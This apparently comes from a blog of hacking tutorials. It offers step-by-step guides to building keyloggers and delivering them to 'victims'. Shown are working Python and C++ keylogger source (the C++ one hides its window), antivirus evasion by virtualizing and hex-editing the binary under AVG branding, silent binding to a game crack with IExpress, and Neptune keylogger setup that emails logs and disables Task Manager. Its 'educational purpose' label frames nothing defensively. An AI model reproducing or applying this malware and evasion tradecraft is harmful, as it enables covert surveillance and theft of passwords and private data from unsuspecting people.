These tutorials are for Educational Purpose

Liked us?

  • Facebook Rocks

    Go to Blogger edit html and replace these slide 1 description with your own words. ...

  • Facebook vs Twitter

    Go to Blogger edit html and replace these slide 2 description with your own words. ...

  • Facebook Marketing

    Go to Blogger edit html and replace these slide 3 description with your own words. ...

  • Facebook and Google

    Go to Blogger edit html and replace these slide 4 description with your own words. ...

  • Facebook Tips

    Go to Blogger edit html and replace these slide 5 description with your own words. ...

How to create an FUD Key logger (or) How to make an Key logger undetectable to antivirus

Welcome back readers, In this tutorial we are going to show you how to make an undetectable keylogger  to most antivirus programs (AVG,AVAST,KASPERSKY).Already we had showed you how to make an key logger in our previous tutorial, if you do not know about it first read that here


Tools required:

*Xenocode post build 2009 for .NET beta
*Hex workshop HEX editor

You can download these from this link (Download mirror)

Step 1: Initially disable your antivirus protection (Here I am using AVG antivirus Right click on AVG and click “Temporarily disable AVG protection” and select ” Until I restart next time”



Step 2: Install  Xenocode post build 2009 for .NET beta & Hex workshop HEX editor.Also don’t forget to use the crack
Step 3: Open Xenocode post build 2009 for .NET beta from program files and go to Application tab and click  “ADD” option from that and add your keylogger file (ie, already prepared through NEPTUNE keylogger or any other.Here)






Step 4: Now go to “VIRTUALIZE” tab and click “ENABLE” check box at left side. Then go to “GENERAL” tab there. Uncheck the “INHERIT PROPERTIES” tick box at right corner. Then change the product title, publisher, description, website, version to your desired (Here I use AVG v11.3.4, AVG corporation, AVG , www.avg.com ,AVG.(Optional:If you want to change the icon click “BROWSE “ option and select the required application and automatically it will change to that app icon.)




Step 5:Now click “XENOCODE APPLICATION “and save it.

Step 6: Now your keylogger file will appear as shown(With avg icon making it undetectable to victim)



Step 7: Now go to “Hex workshop HEX editor (32 bit)” from “All programs”


Step 8: click “File->open->your keylogger file



Step 9:  Press “Ctrl+F” which opens Find dialog box change type to “TEXT STRING” and search for “COPYRIGHT”



Step 10: It will show the result as follows



Step 11: Now select these codes as shown in fig(....... inflate 1.2.3 copyright)



Step 12: Now right click on the selected area and click “FILL” option from that,then click OK.





Step 13: Result will change all binary codes to 00 as shown



Step 14: Then manually search for  “X.e.n.o.c.o.d.e. .V.i.r.t.u.a.l. .A.p.p.l.i.a.n.c.e. .R.u.n.t.i.m.e”(Ctrl+F feature cannot be used here, if required use Ctrl+F and search for letter X and find X.e.n.o.c.o.d.e)


Step 15: again as step 12 right click on the selected area and click “FILL” option from that, and then click OK.



Then it will look as



Step 16: click save option from File->save.



On that dialog box click Yes. Then it will be automatically saved to your key logger file.

Step 17:Turn back the antivirus and scan that key logger file.



Hurrah!!!!  Yes you made it ,an undetectable key logger J !!!This file is not detected by most antivirus (AVG,AVST,KASPERSKY)which is used by most of our friends. You cancheck it through online scanners as shown



Now send that keylogger file to your victim which would not be detected by his antivirus.
If you have any clarifications comment on these post and we will try to solve it at best

How to Bind two .exe files Using windows


Windows in default provides Iexpress applications which have the capability to act as a free Binding application, Iexpress applications are generally used by third party application designers for creating and designing their Windows installer. Iexpress can be generally used for various purposes in this tutorial we will show how to bind two .exe files.(This tutorial can be used for binding key logger files with any games or setup files to execute in a undoubtful way. This can be used to run key logger in an silent way similarly Trojan can also be used)
























STEP 1: click windows key +r key combination to open RUN dialog box and enter “IEXPRESS”(without quotes )as shown and click “OK”.





STEP 2: Select “create new self extraction directive file” and click “Next”.


STEP 3: Select “Extract files and run an installation command” then click on “Next”

STEP 4: Provide an name for your installation package (ex: Prince of Persia trainer)


STEP 5: Select “NO Prompt” and click “NEXT” and select “Do not display a license” and click “Next”



STEP 6: From the next dialog box click “Add“ from menu and add the two .exe files to be binded (server+ application).Here I add two files POP crack +windows server(keylogger).Then click “Next”



STEP 7: Then from the next dialog box provide which program you want to install in User view and which one in hidden (In “Install program “provide your application in “Post install command” select your key logger). click “NEXT


STEP 8: Select “Hidden” from next menu and click “Next”



STEP 9: If you want to display any message to victim you can display here but it’s not necessary everywhere. Here I leave it empty by selecting “NO MESSAGE”


STEP 10: Here enter the save location for  your file by clicking “Browse”. Also don’t forget to select  “Hide File Extracting progress Animation from User”. click “Next”


STEP 11: On Configure restart tab select “only restart if needed” and click “Next”




STEP 12 : Now in “create Package “tab select “Next” and your package will be created at destination.


Finally your installation package is ready to be passed






Creating keylogger to record key strokes in PC using Python 2.7

In this tutorial we will show you how to create an own keylogger to record key strokes in PC directly using Python programming. Using this method you can spy any target computer with ease.

Tools required:

*Phython 2.7 (Download link)

STEP 1: From the start menu select,” Python 2.7 > IDLE(Python GUI)”


STEP 2:  Click “File > New window”


STEP 3: Now type the below code in Phython window  as shown in fig.,

import win32api 
import sys
import pythoncom, pyHook
 
buffer = ''

def OnKeyboardEvent(event):
if event.Ascii == 5:
 
sys.exit()
 

if event.Ascii != 0 or 8:
 
f = open ('c:\\output.txt', 'a')
 
keylogs = chr(event.Ascii)
 
if event.Ascii == 13:
 
keylogs = keylogs + '\n'
 
f.write(keylogs)
 
f.close()
 

while True:
hm = pyHook.HookManager()
 
hm.KeyDown = OnKeyboardEvent
 
hm.HookKeyboard()
 
pythoncom.PumpMessages()



STEP 4 :Save the file in C:\ as Keylogger.py and click  RUN( CTRL + R: the keylogger will come started in the background and will run until the log file "C: \ output.txt" anything that will typed on the keyboard. )

Creating Keylogger to record Key strokes in PC using C++ program(stealth function):


In this tutorial we will show you how to make an simple keylogger to record keystrokes of your PC which is operated in your absence by using Simple C++ program.

Tool’s Required:

*Dev c++  (or) Borland’s C++ (or) Turbo C++ (Download from here)

STEP 1: Create a New project file (File > New) and paste the following code in it

#include 
using namespace std;
#include
 
#include
 

int Save (int key_stroke, char *file);
void Stealth();

int main()
{
Stealth();
char i;

while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}

/* *********************************** */

int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;

FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");

cout << key_stroke << endl;

if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "[LEFT]");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "[RIGHT]");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke == 110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);

fclose (OUTPUT_FILE);
return 0;
}

/* *********************************** */

void Stealth()
{
HWND Stealth;
AllocConsole();
Stealth = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(Stealth,0);
}

STEP 2:Now compile the program(Alt +F4) and make it to an executable server file(.exe)

STEP 3: Now when you click that .exe file you will be followed with an black screen blinking then each of the keystrokes are recorded to “LOG.txt’ at c directory

Hacking friends PC using Neptune keylogger



Key logger are the set of codes which can be used to record the keystrokes of Victim's PC by directly stealing the input from Kernel. In this tutorial we will show you how to make an Keylogger file using a revolutionary software PROJECT NEPTUNE V1.78 keylogger which is available as both freeware & shareware.(Before starting this procedure disable your antivirus  for best results)





 Software required:

*Neptune keylogger(Download link)

Step 1:Download this keylogger from the Download link above.

Step 2: open Project Neptune v1.78 from the downloaded files.


 Step 3: In email settings enter your email id in “ENTER EMAIL TO SEND KEYSTROKE LOGS”(this id should be your fake id since generally email service providers recognize them as spam and delete them in 7 days)

Step 4: Provide your password in “SENDING EMAIL ACCOUNTS PASSWORD”

Step 5: provide your same email ID or different ID where you want to receive (ex:science404error@gmail.com)


Also if you have known about FTP and have a FTP account you can use that too.

Step 6 (optional): If you want to disable mouse clicking /Internet explorer/Registry commands/Run dialog box/Task manger you can do that through going to “SYSTEM WIDE “ tab and checking the necessary check boxes. You can also prevent user from accessing specific websites (ex :any online scanners)


Step 7: In Installation tab you can specify the directory where your key logger is going to RUN on your friends PC .It is best to select “system Files Folder-C:\windows\system32”


Step 8(optional): Using “EXTRA OPTIONS” tab you can display an fake error messages like “Disable Antivirus for best performance”. Also using this tab we can destroy our own key logger files after certain period of time.


During execution the error message will be displayed as


Step 9: The most important step in this process is server creation which needs bit logic .Go to “Server creation”  tab on server settings type the required description, Company, Copyright for ex

*Description: windows security alert
*Company: Microsoft
*Copyright: Microsoft Corporation

You can provide anything but it must be doubtless in regarding because these details will be displayed at task manager during execution

Step 10: Next on “server generation” provide any name to your key logger file (ex:iexplorer.exe) on “SET SERVER NAME’S PROCESS AS”


Step 11: Click on “GENERATE NEW SERVER” and save it to desired location.whoa ! you created an keylogger now send that file to victim.


NOTE: these .exe files are easily detectable and cannot be send by gmail, for this purpose try to compile it with any of other games or word documents and send it to your victim.
If you have any clarifications comment on these post and we will try to solve it at best